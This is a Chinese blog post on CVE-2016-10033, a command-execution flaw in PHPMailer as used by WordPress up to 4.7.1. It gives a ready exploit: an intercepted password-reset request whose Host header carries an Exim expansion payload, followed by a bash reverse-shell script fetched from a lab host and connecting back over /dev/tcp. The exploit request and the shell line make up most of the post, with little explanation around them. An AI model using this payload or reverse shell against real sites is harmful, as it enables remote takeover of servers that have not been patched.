WordPress <= 4.7.1 PHPMailer < 5.2.18任意命令執行漏洞(CVE-2016-10033)-

七彩网络

昔年博客
首页>> Web安全 >>WordPress <= 4.7.1 PHPMailer < 5.2.18任意命令執行漏洞(CVE-2016-10033)

影響範圍:WordPress <= 4.7.1 PHPMailer < 5.2.18

漏洞頁面:/wp-login.php?action=lostpassword

去密碼重置頁面輸入重置用戶名爲admin,提交之後攔截請求,並把host的值修改爲我們的payload

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.176.128:8000/wp-login.php?action=lostpassword
Cookie: wordpress_test_cookie=WP+Cookie+check
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
 
user_login=admin&redirect_to=&wp-submit=Get+New+Password




遠程反彈shell腳本:172.16.176.1:8080/a.txt,內容:

nohup bash -i >/dev/tcp/172.16.176.1/1337 0<&1 2>&1) &


×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

打赏作者
版权所有,转载注意明处:昔年博客 » WordPress <= 4.7.1 PHPMailer < 5.2.18任意命令執行漏洞(CVE-2016-10033)
分享本文至:
点击评论 您阅读这篇文章共花了: 

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)